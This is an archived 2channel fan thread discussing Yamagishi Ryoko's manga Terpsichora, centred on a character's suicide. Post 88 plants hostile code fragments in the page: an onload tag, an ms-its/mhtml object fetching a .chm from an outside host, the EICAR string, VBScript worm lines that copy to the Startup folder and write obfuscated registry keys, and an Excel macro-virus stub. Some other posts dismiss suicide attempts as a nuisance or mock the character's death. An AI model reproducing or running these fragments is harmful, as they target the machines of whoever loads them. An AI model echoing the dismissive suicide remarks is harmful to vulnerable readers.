5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

〓山岸凉子 Part88〓

1 :花と名無しさん:2006/07/10(月) 01:05:06 ID:???0
書籍情報誌ダ・ヴィンチにて連載中のテレプシコーラを中心に
山岸作品をマターリマターリ語りましょう。
コミックス第9巻は7月22日発売予定。

前スレ
〓山岸凉子 Part86〓

お約束、よくある質問、過去ログ、関連スレは>>2-10ぐらい

●新スレ立てはレス番900を超えてから。
立てる前に必ずこのスレで宣言してください。
立てる人が出てこない場合は950を踏んだ人、お願いします。

●ここでのテレプシネタバレは解禁なりました。思う存分語るが良い。
ネタバレが嫌なひとは発売日前後は見ないこと。それで火病られてもこちらでは対処しかねます。

●チャット厳禁。荒らしはスルー。
http://comic6.2ch.net/test/read.cgi/gcomic/1152269056/

2 :花と名無しさん:2006/07/10(月) 01:06:48 ID:???0
バイ、千花!

3 :花と名無しさん:2006/07/10(月) 01:07:58 ID:???0
お約束)
●誰かの発言に注意するときは、相手やまわりに受け容れられる表現で。
何度も注意を重ねるのも逆効果です。スルーを基本に。
●過去ログも増えてきました。現行スレ以外でのガイシュツ話題は
話題になった時期や検索キーワードも教えてあげる配慮をお願いします。
●新スレ立てはレス番900を超えてから。立てる前に必ずこのスレで宣言してください。

※自分語りや"うちの子"ネタはスレが荒れる元なので、自粛しましょう。
  作品にちなんだ物なら、私的経験談や関連知識の話でも、節度があれば楽しめます。
  ただし、それも長く続くとスレ違い気味になりますので気をつけましょう。

よくある質問:
○このスレにおいて「松井」とは舞あけみのことです。(in汐の声)
○作品中に出てくる「27円」とは3×9=「サンキュー」の意味です。(inゆうれい談)
○処天文庫版、氷室冴子さんとの対談の伏字は謎のまま。真実はご本人しかわからないでしょう。

4 :花と名無しさん:2006/07/10(月) 01:08:32 ID:???0
過去ログ保管サイト(〜Part51)
ttp://storage0272.at.infoseek.co.jp/comic/yamagishi/index_yr.html

ttp://makimo.to/cgi-bin/search/search.cgi?q=%8ER%8A%DD%99y%8Eq&sf=2&andor=AND&G=%96%9F%89%E6%81E%8F%AC%90%E0%93%99

(関連スレ)
漫画板スレ
〓山岸凉子 Part80〓
Part80:ttp://comic6.2ch.net/test/read.cgi/comic/1150383333/

懐かし漫画スレ
日出処の天子 第ニ十一戦目
http://comic6.2ch.net/test/read.cgi/rcomic/1152058398

ダンス板スレ
山岸バレエマンガを崇拝するところ[3巻目]
http://hobby8.2ch.net/test/read.cgi/dance/1151992616

5 :花と名無しさん:2006/07/10(月) 01:09:14 ID:???0
過去ログ:
Part1:ttp://piza.2ch.net/gcomic/kako/963/963755966.html
Part2:ttp://salad.2ch.net/gcomic/kako/974/974614604.html
Part3:ttp://salad.2ch.net/gcomic/kako/987/987876521.html
Part4:ttp://salad.2ch.net/gcomic/kako/997/997201153.html
Part5:ttp://choco.2ch.net/gcomic/kako/1002/10022/1002296453.html
Part6:ttp://comic.2ch.net/gcomic/kako/1006/10067/1006751499.html
Part7:ttp://comic.2ch.net/gcomic/kako/1009/10097/1009799288.html
Part8:ttp://comic.2ch.net/test/read.cgi/gcomic/1012098942/
Part9:ttp://comic.2ch.net/test/read.cgi/gcomic/1015907695/
Part10:ttp://comic.2ch.net/test/read.cgi/gcomic/1021185320/
Part11:ttp://comic.2ch.net/gcomic/kako/1026/10261/1026195898.html
Part12:ttp://comic.2ch.net/gcomic/kako/1030/10301/1030112072.html
Part13:ttp://comic.2ch.net/gcomic/kako/1035/10356/1035610421.html
Part14:ttp://comic.2ch.net/gcomic/kako/1037/10376/1037689405.html
Part15:ttp://comic.2ch.net/gcomic/kako/1039/10390/1039014511.htm
Part16:ttp://comic.2ch.net/gcomic/kako/1044/10447/1044719204.html
Part17:ttp://comic.2ch.net/test/read.cgi/gcomic/1051846142/

6 :花と名無しさん:2006/07/10(月) 01:09:49 ID:???0
Part18:ttp://comic.2ch.net/test/read.cgi/gcomic/1054480078/
Part19:ttp://comic.2ch.net/test/read.cgi/gcomic/1056090955/
Part20:ttp://comic.2ch.net/test/read.cgi/gcomic/1057412176/
Part21:ttp://comic.2ch.net/test/read.cgi/gcomic/1058617328/
Part22:ttp://comic.2ch.net/test/read.cgi/gcomic/1060252179/
Part23:ttp://comic.2ch.net/test/read.cgi/gcomic/1062246838/
Part24:ttp://comic.2ch.net/test/read.cgi/gcomic/1064998596/
Part25:ttp://comic.2ch.net/test/read.cgi/gcomic/1069742484/
Part26:ttp://comic.2ch.net/test/read.cgi/gcomic/1073536659/
Part27:ttp://comic4.2ch.net/test/read.cgi/gcomic/1078488875/
Part28:ttp://comic6.2ch.net/test/read.cgi/gcomic/1084176344/
Part29:ttp://comic6.2ch.net/test/read.cgi/gcomic/1089477314/
Part30:ttp://comic6.2ch.net/test/read.cgi/gcomic/1093109139/
Part31:ttp://comic6.2ch.net/test/read.cgi/gcomic/1095260682/
Part32:ttp://comic6.2ch.net/test/read.cgi/gcomic/1097377181/
Part33:ttp://comic6.2ch.net/test/read.cgi/gcomic/1099309246/
Part34:ttp://comic6.2ch.net/test/read.cgi/gcomic/1101801714/
Part35:ttp://comic6.2ch.net/test/read.cgi/gcomic/1105086293/
Part36:ttp://comic6.2ch.net/test/read.cgi/gcomic/1106886908/
Part37:ttp://comic6.2ch.net/test/read.cgi/gcomic/1108648003/

7 :花と名無しさん:2006/07/10(月) 01:10:22 ID:???0
Part38:ttp://comic6.2ch.net/test/read.cgi/gcomic/1110549534/
part39:ttp://comic6.2ch.net/test/read.cgi/gcomic/1112782056/
Part40:ttp://comic6.2ch.net/test/read.cgi/gcomic/1113686425/
Part41:ttp://comic6.2ch.net/test/read.cgi/gcomic/1115281724/
Part42:ttp://comic6.2ch.net/test/read.cgi/gcomic/1115826231/
Part43ttp://comic6.2ch.net/test/read.cgi/gcomic/1117203951/
Part44:ttp://comic6.2ch.net/test/read.cgi/gcomic/1117908994/
Part45:ttp://comic6.2ch.net/test/read.cgi/gcomic/1118388338/
Part46http://comic6.2ch.net/test/read.cgi/gcomic/1119451886/
Part47http://comic6.2ch.net/test/read.cgi/gcomic/1120555830/
Part47http://comic6.2ch.net/test/read.cgi/gcomic/1121165451/ (重複スレ)
Part49:ttp://comic6.2ch.net/test/read.cgi/gcomic/1122478090/l50
Part50:ttp://comic6.2ch.net/test/read.cgi/gcomic/1123677260/l50
Part51:ttp://comic6.2ch.net/test/read.cgi/gcomic/1126093874/
Part52:http://comic6.2ch.net/test/read.cgi/gcomic/1127281089/
Part53:ttp://comic6.2ch.net/test/read.cgi/gcomic/1128428966/
Part54:ttp://comic6.2ch.net/test/read.cgi/gcomic/1128779631/
Part55:ttp://comic6.2ch.net/test/read.cgi/gcomic/1129269636/
Part56:ttp://comic6.2ch.net/test/read.cgi/gcomic/1130483253/
Part57:ttp://comic6.2ch.net/test/read.cgi/gcomic/1131412137/

8 :花と名無しさん:2006/07/10(月) 01:10:22 ID:???0
>>1乙でした〜!


実は>>4だけで過去スレは事足りてるんだよな。
また長々と張るの?

9 :花と名無しさん:2006/07/10(月) 01:13:08 ID:???0
んじゃもうテンプレいいんじゃね? >>1さん乙。

10 :花と名無しさん:2006/07/10(月) 01:15:48 ID:???0


11 :花と名無しさん:2006/07/10(月) 01:17:07 ID:???0
また前スレに誘導貼れなかったのね・・・。

12 :花と名無しさん:2006/07/10(月) 01:17:47 ID:???0
乙です

13 :花と名無しさん:2006/07/10(月) 01:17:48 ID:???0
>>1乙。
漏れも、>>4だけのほうがすっきりしてイイとオモ。
だいたいが最近の過去スレは、アドレスそのまま張っても、まだ読めないんだし。
結局>>4のほうで見ることになる。

14 :花と名無しさん:2006/07/10(月) 01:17:52 ID:???0
これから980が近づいてきても知らん顔、新スレたっても1に乙さえせず、
くだらん議論で埋めるだけ、新スレテンプレの粗探しするババーのことを泊瀬ババと呼びます。

15 :花と名無しさん:2006/07/10(月) 01:18:31 ID:???0
>>11
誘導なんてなくても、常に上がってる状態だからイラネ。ww

16 :花と名無しさん:2006/07/10(月) 01:19:39 ID:???O
出遅れたけど>>1さん乙です!

17 :花と名無しさん:2006/07/10(月) 01:19:40 ID:???0
前スレの誘導、あれば便利だけど探すのは別に大変じゃないからいいよ

18 :花と名無しさん:2006/07/10(月) 01:20:27 ID:???0
1乙。
前スレ961のリンク先に楳図かずおのバレエ漫画が!!

19 :花と名無しさん:2006/07/10(月) 01:21:31 ID:???0
ケバ子とデブ子はこのままフェードアウトなのかな

20 :花と名無しさん:2006/07/10(月) 01:21:34 ID:???0
前スレ

病院は病気や事故で怪我をした人のための施設だから
自殺する人はうざいでしょ
その人を治療するために、他の患者さんが後回しにされることもあるだろうし

自殺したから同情されて当たり前という考え方が腐ってる

21 :花と名無しさん:2006/07/10(月) 01:24:03 ID:???0
>>20
死ぬつもりはなくても、
無謀なことやって病院送りになる奴もいそうだがなー
まとめて後回しにできればイイのに。

22 :花と名無しさん:2006/07/10(月) 01:24:22 ID:???0
なにかつらいことがあって自殺するとか、心を病むとか
それはそういうこともあるよねと思えるし
今を乗り越えていく手伝いをしてあげたいとも思える

しかし真剣もなくホントは死ぬ気はなく単にまわりに
かまって欲しくてやってるやつ、マジウザい。


23 :花と名無しさん:2006/07/10(月) 01:24:33 ID:???0
>>20
というか、リスカがウザイというのはわかるけど、
だからと言って飛び降りて死ねというのはどうかと思った。

24 :花と名無しさん:2006/07/10(月) 01:24:50 ID:???0
>>20
なんか荒んでるね。

25 :花と名無しさん:2006/07/10(月) 01:24:52 ID:???0
>>20
千花を病院に運び込んだのは間違い。
直接警察の死体置き場に運ぶべきだったんですよね。

26 :花と名無しさん:2006/07/10(月) 01:25:38 ID:???0
>>25 意味不明ですが・・

27 :花と名無しさん:2006/07/10(月) 01:25:47 ID:???0
スレ立て乙っす!

くだん書房、いいわ〜

28 :花と名無しさん:2006/07/10(月) 01:25:59 ID:???0
飛び降りで瀕死状態で運び込まれてもうざいってことだよね?
なんかただでさえ自殺失敗して肩身狭いのに病院でも
うざがられるなんて可哀相

29 :花と名無しさん:2006/07/10(月) 01:26:33 ID:???0
>>28 もう一度読み返せ

30 :花と名無しさん:2006/07/10(月) 01:27:03 ID:???0
>>26
病院は病気や事故で怪我をした人のための施設だから
自殺する人はうざい
とのことですよね、>>20は?
その説を援用すれば、自殺した千花(それも既に死んでる)を
病院に運ぶのは間違ってるわけです。

31 :花と名無しさん:2006/07/10(月) 01:27:54 ID:???0
>>18
楳図かずおの絵があまりに違っていて、探すのに手間取った。
わたなべまさこって、あのわたなべまさこですよね。
あの時代ももバレエがブームだったんですね。


32 :花と名無しさん:2006/07/10(月) 01:27:57 ID:???0
>>29
>>20で自殺するやつはうざいって書いてある。
ボダのかまってリスカじゃなくてもうざいんでしょ?


33 :花と名無しさん:2006/07/10(月) 01:28:45 ID:???0
千花とリスカが趣味のメンヘラが明らかに違うことは
誰もが分かってるんだし、しょーもない絡みはやめよう。

でもあの千花が遺書もなしっつーのはちょっと不思議
自分のつらさを告白したりはしなくても
親に感謝と謝罪ぐらい書きそうなもんだけど

34 :花と名無しさん:2006/07/10(月) 01:28:47 ID:???0
でも実際、明らかに即死なら、病院で千花の遺体と対面ってのは変じゃねえか?
救急車も明らかな死体は運ばないよ。

35 :花と名無しさん:2006/07/10(月) 01:29:08 ID:???0
死ぬ気バッチリで、もう少しで死ねたという人を、
蘇生させちゃって、後遺症が洒落にならないほど重いとか、
そういう場合もあるんだろうな。

36 :花と名無しさん:2006/07/10(月) 01:29:30 ID:???0
>>30
前スレ990はリスカ限定の話。その流れでしょ。

37 :花と名無しさん:2006/07/10(月) 01:30:00 ID:???0
運ぶよ。死亡確認は医者がやるんだし。

38 :花と名無しさん:2006/07/10(月) 01:30:02 ID:???0
ナースとしては、命を粗末にする奴が許せないんでしょうね

39 :花と名無しさん:2006/07/10(月) 01:30:30 ID:???0
>>23
それ書いたの自分じゃないし

40 :花と名無しさん:2006/07/10(月) 01:31:05 ID:???O
>>1
なかなかやるじゃない




今月号、白い布でぐるぐる巻きにされてんのが
納体袋?

41 :花と名無しさん:2006/07/10(月) 01:31:15 ID:???0
>>35 そう、それものすごく虚しい。
誰も幸せにならない仕事をしてしまったって感じ
しかも結構ある・・

42 :花と名無しさん:2006/07/10(月) 01:31:22 ID:???0
リスカでも本気でざっくりやってるのはうざいって書いてたじゃん

43 :花と名無しさん:2006/07/10(月) 01:32:12 ID:???0
>>37
現場で検視医が死亡確認するのかと思った。
飛び散った肉とかも、拾い集めて運ぶのかな?それとも現場に置き去り?

44 :花と名無しさん:2006/07/10(月) 01:32:14 ID:???0
>>20
「医龍」でもあったっけ。そういうシーン。
「またこいつかよ」ってな感じで。

45 :花と名無しさん:2006/07/10(月) 01:32:35 ID:???0
本気じゃなくて、死ぬ気のないかまってちゃんがウザイって話だったのでは

46 :花と名無しさん:2006/07/10(月) 01:34:20 ID:???O
>>35
電車に飛び込んで奇跡的に生き残った人の
ブログが過去スレにあったと思う

47 :花と名無しさん:2006/07/10(月) 01:34:57 ID:???0
まあ、数回失敗を繰り返すような人でも、
何度目かには成功したりするからね。>自殺

48 :花と名無しさん:2006/07/10(月) 01:35:02 ID:???0
ナースの人と、同意した人と複数の人が書き込んでるんだから(多分)
ああ言ったこう言ったって言いがかりつけても仕方ないと思うが

49 :花と名無しさん:2006/07/10(月) 01:35:42 ID:???0
私はナースじゃないんだけど
農薬自殺を図ったおばあさんを見たことがある
ばたばた暴れちゃって、農薬飲むとこうなるんだと吃驚していたら
狂言だった

ドクターはそれでも親身になっていろいろ聞いてあげたりしたんだけど
ナースが怒っちゃって「先生、こんな人さっさと返しちゃってください!!」だってさ

おばあさん、寂しかったんだよ

50 :花と名無しさん:2006/07/10(月) 01:36:15 ID:???0
>>45
病院は本気問わず自殺する人の来る所ではなく
病気や事故の人が来る所だって

51 :花と名無しさん:2006/07/10(月) 01:36:51 ID:???0
>>49
まあ、それも寂しい話ではあるね

52 :花と名無しさん:2006/07/10(月) 01:37:29 ID:???0
>>49 同情の余地はあるけど、
きびしく叱られても仕方ない余地もあると思うぞ

53 :花と名無しさん:2006/07/10(月) 01:38:11 ID:???0
今日も、ロクでもない脱線で伸びてるね。

54 :花と名無しさん:2006/07/10(月) 01:40:10 ID:???0
なら自分で話題振れば?

55 :花と名無しさん:2006/07/10(月) 01:41:18 ID:???0
>>50 まあその線引きだけでは無理があるけどね
遊びまくってエイズになったとか
タバコ吸いまくって癌になった人とか
酒飲みまくって何度も入退院繰り返す人とか
趣味の薬物中毒とか
何度も言われてるのにバカ食いして肥満からの病気とか

一時的な自殺で、病院でたちおなる人より
ずっと性悪い人もいっぱいいるし

56 :花と名無しさん:2006/07/10(月) 01:41:27 ID:???O
>>41
誰も幸せにならないって
そんな事あるのかな。
本人は後で幸せになって助けてもらって感謝するかもよ?

57 :花と名無しさん:2006/07/10(月) 01:44:15 ID:???0
>>56 いや、超重い障害が残るとそんなこと言ってられんのよ
一生動くことも話すことも食べることもできません息も出来ません
ベッドに機械とチューブつないで莫大なお金がこの先ずっとかかります
家族の人は逃げることもできない。兄弟や子供の将来まで
すごい犠牲にすることも多々ある。

58 :花と名無しさん:2006/07/10(月) 01:45:40 ID:???0
つまらねえスレだな。
じゃあ来るな禁止。

59 :花と名無しさん:2006/07/10(月) 01:45:58 ID:???0
多々あるのか

60 :花と名無しさん:2006/07/10(月) 01:46:18 ID:???0
>>58
じゃあ来るなw

61 :花と名無しさん:2006/07/10(月) 01:48:15 ID:???0
自殺じゃないけど
シンナー吸引して大火傷して手足のない人をTVで見たことがある
まさにダルマ
こんなもん放映していいのかと

歯もシンナーでぼろぼろだった

62 :花と名無しさん:2006/07/10(月) 01:48:22 ID:???0
>>57
泣くしかないな。
不慮の事故とかじゃないんだもんね。

63 :花と名無しさん:2006/07/10(月) 01:51:31 ID:???0
そんなになっちゃうと九死に一生を得ても
「お婆ちゃんの為にもう一度バレエを踊りたい」
なんて言ってる場合じゃないのね。

64 :花と名無しさん:2006/07/10(月) 01:52:28 ID:???O
>>57
それは超重い障害が残って、回復する見込みなしで
死んだ方がマシって状態?


それは難しいね。
尊厳死とも絡んでくるかも?

まあ個人的には回復しなくてかつ本人に死ぬ意志があるなら
死なせてあげてもいいと思うけど。


でも回復するなら生かして欲しい。

65 :花と名無しさん:2006/07/10(月) 01:54:11 ID:???0
意思の疎通もできないよ。
千花がそんな状態だったら…

66 :花と名無しさん:2006/07/10(月) 01:55:04 ID:???0
>>64
何年何年も意識不明のまま経って
なぜかある日「奇蹟の回復!」
みたいなことになる例もたまーにあるから
判断しにくいよね……
いずれにしても大変。

67 :花と名無しさん:2006/07/10(月) 01:55:47 ID:???O
もしチカが飛び降りて
車椅子程度まで回復するなら
生かして欲しいよ。

68 :花と名無しさん:2006/07/10(月) 01:56:47 ID:???0
チカちゃんには生きていてほしかったよ…

69 :花と名無しさん:2006/07/10(月) 01:56:52 ID:???0
9階から飛び降りて殆ど障害も残らず復帰した窪塚ってすごいね

70 :花と名無しさん:2006/07/10(月) 01:57:48 ID:???0
窪塚はすごすぎる……
ここまですごいやつだとは正直思わんかった

71 :花と名無しさん:2006/07/10(月) 01:58:05 ID:???0
本当だ!
千花は8階で死んだのに
根性ないな

72 :花と名無しさん:2006/07/10(月) 01:58:46 ID:???0
ジョニー大倉は何階からだっけ?

73 :花と名無しさん:2006/07/10(月) 01:59:19 ID:???0
7階

74 :花と名無しさん:2006/07/10(月) 01:59:20 ID:???O
チカが病院に運ばれて
ナースにウザイなーと思われてたとしたら
やりきれないな。


漫画だけど(笑

75 :花と名無しさん:2006/07/10(月) 02:00:49 ID:???0
飛び降りとか飛び込みは「本気」だからね

リスカとか服毒とは違う

76 :花と名無しさん:2006/07/10(月) 02:03:45 ID:???0
美貌の車椅子女医でも良かった

77 :花と名無しさん:2006/07/10(月) 02:06:15 ID:???0
飛び降り後に放映された「ピンポン」
I can fly〜♪
ってそのシーンいいんかいっ  と思ったよ


78 :花と名無しさん:2006/07/10(月) 02:19:13 ID:???0
>>59
首吊りで脳が酸欠になって・・・というのは結構あると、何かで読んだ。

79 :花と名無しさん:2006/07/10(月) 03:01:52 ID:???0
千花は怖くはなかったのかなあ

80 :花と名無しさん:2006/07/10(月) 03:06:13 ID:???0
>>1乙。
つか前スレで誘導する前に埋められてしまったのか?
流れ早すぎ〜

81 :花と名無しさん:2006/07/10(月) 03:11:41 ID:???0
>>79
鬱だから怖いとか怖くないとかそう感じる暇もないのかも
ただただ「もう死ぬんだ」っていう気持ちだけになっちゃうとか

82 :花と名無しさん:2006/07/10(月) 03:43:30 ID:???O
マンション侵入した時の顔が見れないのが怖い…

83 :花と名無しさん:2006/07/10(月) 03:59:10 ID:???0
ネットの書き込みから
実はパソコンに詳しかった桜子が(ログ全保守)
犯人を洗い出す
そんなサブストーリー希望

してない

84 :花と名無しさん:2006/07/10(月) 04:14:55 ID:???0
桜子カコヨスww

85 :花と名無しさん:2006/07/10(月) 04:29:27 ID:???O
>>79
そのへん想像するとすごくこっちが恐い
建物選ぶのも侵入するのもこれからアッチへ行くと
考えてたと思うと

86 :花と名無しさん:2006/07/10(月) 04:39:55 ID:y03HWF5D0
山岸先生、部数の割にはスレ伸びすぎ…(才能ある先生とはわかってるけど
ムチャクチャ売れてる漫画家でもないとオモ)
おばさんはヒマなんだね…


87 :花と名無しさん:2006/07/10(月) 04:45:33 ID:???O
桜子、本部レッスン組なんだから、別に家も近くないし接点もほとんどないだろうね。
貝塚友達からメールが回ってきただろうけど。
桜子、続けてればよかったのになあ。
ノンナみたいに、一度でできないから何度も努力する系の天才になってほしかった。

ここまで書いて思ったが
テレプシ序盤、六花「わたしもバレエが踊りたい!」のあたりで夜中に起き出してレッスンする千花ちゃん。かっこよかった。
体をあたためて、コッコッと床鳴らして。
クラランスのマッサージジェルかなんかで足をほぐしてる場面もそうだけど、千花ちゃんのバレエまっしぐら描写が全て
チネなムぶ~驍頤R殺ン、し奚ホ
に見えてしまう。コミックス読めないよ〜。

88 :<body onload=window()>:2006/07/10(月) 06:38:24 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

89 :花と名無しさん:2006/07/10(月) 07:27:15 ID:???0
娘が自殺して実母が死んでも他人ごとのように
あっさりしてるお父さん。

90 :花と名無しさん:2006/07/10(月) 07:34:00 ID:???O
>>88
ひるむと…思ってんのか…
これしきの…コードでよ(ナランチャ)

>>89
凹むと…思ってんのか…
これしきの…不幸でよ(オトタマ)

91 :花と名無しさん:2006/07/10(月) 07:57:50 ID:???O
千花は1〜2年、舞台は諦めて自宅稽古場でストレッチに専念すれば良かったのに。
怪我した足は無理に使わないで、金子先生に稽古してもらうとか。
移植手術急ぎ過ぎ。少し待って、ママンから生体移植してもらえば良かったのに。
親子間なら、移植問題も(適合さえすれば)大丈夫でしょ。
待ってる間、バレエとは違う生き方を見付けられたかもしれないし、死ぬよりずっとマシな結果になったと思う。
って、いまだに千花ちゃんの自殺が悔しいよ。

92 :花と名無しさん:2006/07/10(月) 07:59:53 ID:???0
>>89
男ってのはオヨヨと泣いて倒れる訳には
いかんのよ。
千恵子が倒れたんだからよけいしっかり
しないといけないと思うもんでそ。

93 :花と名無しさん:2006/07/10(月) 08:00:33 ID:???0
ダディクール!

94 :花と名無しさん:2006/07/10(月) 08:01:12 ID:???0
>>87
あの熱心さも凄いと思うが、自習したいなと思ったら時間に関係なくいつでも
稽古場が使え、スタジオ使用料も払わなくていい....という恵まれた環境に
あるんだということにも気づいてあげて。
しつこいほどのクミとの対比は、あの姉妹がお稽古する上でどれだけ恵まれた
環境にあるか ということを読者に察知させるという意図もあるんだから。

95 :花と名無しさん:2006/07/10(月) 08:01:24 ID:???0
>>75
服毒もものによっては十分本気ですが。

それにしても結構キツい人多いのね。
自殺するのは精神が(脳が)病んでいるからで、だから鬱っていうのは
命に関わる病気なんだと私は認識しているけど。

96 :花と名無しさん:2006/07/10(月) 08:02:47 ID:???0
>>89
全然あっさりしてるようには見えないけどなぁ。
大黒柱なんだからしっかりしなきゃ仕方ないじゃん。

97 :花と名無しさん:2006/07/10(月) 08:05:45 ID:???0
「瑠璃の爪」みたいに、撒き散らされた情報が組み合わさって、
事件の様相がジンワリわかってくるのね・・・。
あれを「テレプシ」でやるなら、最後はチカの霊が、
「自殺することしかできなかった幼稚な私」とか語り出しそう。

98 :花と名無しさん:2006/07/10(月) 08:10:30 ID:???0
>>77
またここに現実と創作の区別が(r
大体日本の自殺者ってすごく多いんでしょ?


99 :花と名無しさん:2006/07/10(月) 08:15:06 ID:???0
>>95
まあ実際は精神を病んでるんだけど
「治りたくて来てる人」から見れば
「自分で自分を殺そうとしてる人」ってのを
優先とかされたらちょっとねえ、と
思うでしょうね。

100 :花と名無しさん:2006/07/10(月) 08:56:32 ID:???0
誰ですか?こーいうカキコしたのは....。
埼玉コンの情報とりに行ってみたらorz

【埼玉限定】バレエ教室!その2
http://hobby8.2ch.net/test/read.cgi/dance/1127581438/l50
----------------------------------------------------------
370 :踊る名無しさん :2006/07/03(月) 04:18:25
篠原先生の教室のコいる?
千花ちゃんのことがあってから篠原先生いつもお酒臭いし教室変えようかと思うんだけど
375 :踊る名無しさん :2006/07/03(月) 14:54:28
>>370 いますよ・六花ちゃん。
378 :踊る名無しさん :2006/07/03(月) 20:22:36
>>エミちゃんですか?



101 :花と名無しさん:2006/07/10(月) 08:58:50 ID:???0
手帳を処分しないで残して逝ったってことは
自分の苦しみを知って欲しかったんだろうな。
それかそんなことも思いつかないほど衝動的だったか?とは思うけど
わざわざマンション住人に合わせてオートロック侵入するくらいだからな・・・。

102 :花と名無しさん:2006/07/10(月) 09:27:16 ID:???0
>>101
マンションの前にぼんやり立ってたら、その時たまたま親子連れが来て、ドアが
開いたんで…くらいの動機だったかもね。
誰も来なかったら、その日はそのままスッと家に帰ってたんじゃないか
って気がする。

103 :花と名無しさん:2006/07/10(月) 09:32:28 ID:???0
>>78
フランク永井

104 :花と名無しさん:2006/07/10(月) 09:42:11 ID:???0
>>103
体の中で脳が1番酸欠に弱くて、心臓や肺は復活しても、
脳はダメになっちゃうことが、溺れた場合なんかにもあるそうだ。

105 :花と名無しさん:2006/07/10(月) 09:55:39 ID:???0
>>104
出産時の事故でもよくあるよね。
だから難産になりそうなら帝王切開。そのギリギリの見極めが難しい。

106 :花と名無しさん:2006/07/10(月) 09:58:22 ID:???0
>>102
あー。それはあり得る。
でもあのままの状態ならいつかはやっちまっただろうけど。

107 :花と名無しさん:2006/07/10(月) 10:06:00 ID:???O
坂口お香典おくってたけど友達の兄弟が死んだ場合
面識無くても香典あげたりするものなの?

108 :花と名無しさん:2006/07/10(月) 10:11:07 ID:???0
この場合は慣例がどうのこうのではなく、坂口家の人たちの気持ちの問題では。

109 :花と名無しさん:2006/07/10(月) 10:11:21 ID:???0
兄弟というか「家族」というのが規準なんじゃないだろうか?


110 :花と名無しさん:2006/07/10(月) 10:13:47 ID:???0
「お姉さんにも」って金のわらじあげてたじゃんか。
親友のお姉さんだからくれたんじゃない。
それともおばあちゃんから持たされたとか。

111 :花と名無しさん:2006/07/10(月) 10:19:04 ID:???0
コミクス組なんで、8巻より後の掲載分の内容はスレでしかでわからないんだが、
もしかして、坂口のおばあちゃんは、かって坂口がいじめにあってたことを
知ってて、それで余計孫と友達でいてくれるユキに好意的なんだろうか?
それとも単にユキがおばあちゃんを褒めてたってことを孫からきいたから?
その辺の描写ってあった?

112 :花と名無しさん:2006/07/10(月) 10:25:49 ID:???0
坂口っていじめられてたっけ?

113 :花と名無しさん:2006/07/10(月) 10:28:01 ID:???0
何度読んでも、お母さんの「私は千花のなにを見ていたの・・」が泣ける( ;∀;)

114 :花と名無しさん:2006/07/10(月) 10:32:04 ID:???0
お母さんて娘としての千花ちゃんじゃなくてバレリーナとしての
千花ちゃんを見ていたもんね。なにしろ千花ちゃんの2度目の
怪我の時、最初に出た言葉が「千花は千花はどうなるんですか?!」
だもん。普通は娘を気遣って本人に言葉をかけるよね。


115 :花と名無しさん:2006/07/10(月) 10:33:12 ID:???0
「あいつ」がユキだったら面白かったのに。
まぁそれは無いだろうけど。
クララ成功後にルンルンで
「チカちゃんが言ったとおり私、運がいいみたい♪運も実力のうちっていうもんね」
くらいのんきなこと言いそうな妹ではある。

116 :花と名無しさん:2006/07/10(月) 10:37:16 ID:???0
>>115
ユキのルンルンなセリフはありそうだ。表情まで浮かんじゃったよ。

117 :花と名無しさん:2006/07/10(月) 10:39:24 ID:???0
ユキチカは
http://mbs.jp/jyonetsu/2003/20030309/goroku.html

の姉妹みたいになるのかと思ってたよ。
このお姉ちゃんも靱帯損傷してるし。
休日もレッスン派。
妹は「バレエのことを考えない日も必要」って子。
上の子と下の子の特徴がすごく出ていて仲も良いし。
チカが「ライバルがこんなに近くに!」みたいなところからわくわくしてたけど。
二人で切磋琢磨して欲しかったな。

118 :花と名無しさん:2006/07/10(月) 10:46:05 ID:???O
>>113
そこのページは開くだけで泣けてくるよ。
「誰も誰も千花ちゃんの本当の苦しみをわかってあげられなかった」
も…

119 :花と名無しさん:2006/07/10(月) 10:56:33 ID:???0
でもチカは生きている限り家族から期待され続けたんだろうから、
わかってもらうには自殺するしかなかったんだよね。

120 :花と名無しさん:2006/07/10(月) 11:00:22 ID:???0
千花はいつから自殺する想定だったんだろう?
少なくともトゥオネラの白鳥のCDを六花が見つけた時にはそのつもりだったんだろうけど。。。
いじめの話がなかなか表面化しなかったりしたのは、やはり自殺させるつもりだったからで、
もしかしてこの漫画描き始めた時から自殺させるつもりだったのかな?
もしそうなら山岸スゴイ。。。

121 :花と名無しさん:2006/07/10(月) 11:04:12 ID:???0
人に振り返られずに死ぬとは
こんなにも哀れで滑稽だ

122 :花と名無しさん:2006/07/10(月) 11:04:21 ID:???0
>もしかしてこの漫画描き始めた時から自殺させるつもりだったのかな?

もちろんそうでしょ。
途中で医学部進学ってのもチラっと考えたかもしれないけど。

123 :花と名無しさん:2006/07/10(月) 11:07:03 ID:???0
>>117
なーんか、六花千花の元々のモデルっぽいね。

124 :花と名無しさん:2006/07/10(月) 11:10:28 ID:???0
>>123
でも親はバレエ教師じゃなかったはず。

125 :花と名無しさん:2006/07/10(月) 11:22:57 ID:???0
>>107
坂口はいじめられっこだったから
数少ない孫の友人に礼儀を欠かすまいとの
ばあちゃんの配慮かねえ。
ばあちゃんはいい人だね。

126 :花と名無しさん:2006/07/10(月) 11:25:25 ID:???0
>>120
つかこういう意見さんざん外出
窪塚もNGワードにしたいw

127 :花と名無しさん:2006/07/10(月) 11:30:09 ID:???0
